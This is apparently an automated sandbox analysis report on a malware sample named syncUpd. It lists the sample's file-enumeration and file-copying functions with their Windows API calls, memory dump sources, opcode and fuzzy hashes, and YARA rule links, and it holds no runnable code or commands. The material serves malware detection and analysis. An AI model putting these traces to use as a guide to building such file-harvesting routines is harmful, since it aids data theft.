                                                                                                                                                                                                                                                              • Opcode ID: ad035d2452cfe8c571d31484953574fcc576d20caed83110d92fb8222da88d5d
                                                                                                                                                                                                                                                              • Instruction ID: b2da76e54139debb2110315e56be9ade241601a02067048fbf282dbacc0cb0a7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad035d2452cfe8c571d31484953574fcc576d20caed83110d92fb8222da88d5d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D9143B29006189FDB24EBA4DC85FEE737DBF94700F044589F61A96180EB749B85CFA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004121F0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00412223
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D84C), ref: 00412268
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D850), ref: 0041227E
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004122FF
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00412314
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0095DCD0), ref: 00412339
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00964F28), ref: 0041234C
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00412359
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0041236A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                                                                                                                                                                                                                              • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                              • API String ID: 13328894-2848263008
                                                                                                                                                                                                                                                              • Opcode ID: 9981a7beed2cde5139ba051f86bf9b6729deee4ded77a24f3aafbd8258fa87e2
                                                                                                                                                                                                                                                              • Instruction ID: 68eafe57ffc654504e5fb8166b756e3a47007b1446461b295be9b39175aa6662
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9981a7beed2cde5139ba051f86bf9b6729deee4ded77a24f3aafbd8258fa87e2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5551A6B5940618ABCB20EBB0DC89FEE737DAB98300F404689F61A96150DF749BC5CF94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 009027D7 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 009027F0
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00902807
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D864), ref: 00902835
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D868), ref: 0090284B
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00902A20
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00902A35
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 180737720-0
                                                                                                                                                                                                                                                              • Opcode ID: 26faf157f702507331b55cdccac807b87ca62a28b2772986770582c89584f0b0
                                                                                                                                                                                                                                                              • Instruction ID: 587c86b541892a3fbca34c8e9b89d5a124da974a5afdeca889d7bb93fb3fd3ff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26faf157f702507331b55cdccac807b87ca62a28b2772986770582c89584f0b0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B86147B2900618ABDB24EBE4DD49EEA737DBF58700F044589F60A96080EF749B85CF91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00411B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00411B9D
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00411D52
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                                                                              • API String ID: 180737720-4073750446
                                                                                                                                                                                                                                                              • Opcode ID: 8b93bd78b39c71b977efe68c3536e7246d8c1b7eb887c6d70fda356c8a532265
                                                                                                                                                                                                                                                              • Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b93bd78b39c71b977efe68c3536e7246d8c1b7eb887c6d70fda356c8a532265
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00902457 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00902467
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0090246E
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0090248A
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 009024A1
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D84C), ref: 009024CF
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D850), ref: 009024E5
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00902566
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0090257B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624D04), ref: 009025A0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624A28), ref: 009025B3
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 009025C0
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 009025D1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 671575355-0
                                                                                                                                                                                                                                                              • Opcode ID: 3f2a756cd69fb0cc8e6f9d651b08e7a90b6bdcd432788a9239540e0f9b24c74c
                                                                                                                                                                                                                                                              • Instruction ID: ff4331673f2e8064bfcfd3c9ea48fe3a5d58e3731365e51df1a284df58321eee
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f2a756cd69fb0cc8e6f9d651b08e7a90b6bdcd432788a9239540e0f9b24c74c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE5162B1940618AFCB24EBB4DC89FED777DAF98700F404588B61996090DF749B85CFA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00901DE7 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00901E04
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00901E1B
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D834), ref: 00901E49
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D838), ref: 00901E5F
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00901FA4
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00901FB9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 180737720-0
                                                                                                                                                                                                                                                              • Opcode ID: 292caba338b0fc5bb838edf58517bb1a85efe24c0dbfe2b158fc0bf7dc417963
                                                                                                                                                                                                                                                              • Instruction ID: 18d2f9f7c8b5460aab89dfe9cb8b168234af017b0a1cbaac9e5477468303a2e5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 292caba338b0fc5bb838edf58517bb1a85efe24c0dbfe2b158fc0bf7dc417963
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C15152B6900618ABCB24EBB4DC89EEE737DBF84700F444588B75A96080DB759B85CF90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040D540 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0041D746), ref: 0040D58E
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC28), ref: 0040D5DE
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC2C), ref: 0040D5F4
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DB0A
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040DB1C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID: [@$\*.*
                                                                                                                                                                                                                                                              • API String ID: 2325840235-1445036518
                                                                                                                                                                                                                                                              • Opcode ID: ac13b402069e636e445e69ba6fb86d94cd6daf0104cacd491668481f55a2eb5f
                                                                                                                                                                                                                                                              • Instruction ID: 5086e1dd9f189559ddbff5738d7534b81ef4efc7c2da90a7a59429af0ff5c2f4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac13b402069e636e445e69ba6fb86d94cd6daf0104cacd491668481f55a2eb5f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F1E3759142189ACB15FB61DC91EDE7739AF54304F8142DFA40A62091EF34AFC9CFA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004015C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00401D1C
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                                                              • API String ID: 1415058207-1173974218
                                                                                                                                                                                                                                                              • Opcode ID: 67436cf5558208d7a974e95cdca42fe5b4e51a3556e1e043cb0b423c581ce31b
                                                                                                                                                                                                                                                              • Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67436cf5558208d7a974e95cdca42fe5b4e51a3556e1e043cb0b423c581ce31b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040D4EE
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040D500
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3334442632-0
                                                                                                                                                                                                                                                              • Opcode ID: 4737da3332eb050fb7f5b83656f90f85ae3f9a175fb1f793fd7e4552fc240b82
                                                                                                                                                                                                                                                              • Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4737da3332eb050fb7f5b83656f90f85ae3f9a175fb1f793fd7e4552fc240b82
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008FD427 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 008FD492
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC14), ref: 008FD4DA
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC18), ref: 008FD4F0
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008FD755
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 008FD767
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3334442632-0
                                                                                                                                                                                                                                                              • Opcode ID: 9b431ad17454946b517c4100d9e0b82599836ab309f1ed7ac4e13ba255db2222
                                                                                                                                                                                                                                                              • Instruction ID: b6188e0c74e8f37c80da9e2eac5389f8b157f762132663e03c58498d7c171414
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b431ad17454946b517c4100d9e0b82599836ab309f1ed7ac4e13ba255db2222
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F912172D042089FCF14FBB4DD56AFEB379ABD4714F004668F60A96185EE34AB488BD1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F1827 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,?,?,004215C8,?,?,00000000,?,00000000), ref: 008F1A7A
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215CC), ref: 008F1ACA
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215D0), ref: 008F1AE0
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008F1E97
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008F1F1B
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008F1F71
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 008F1F83
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
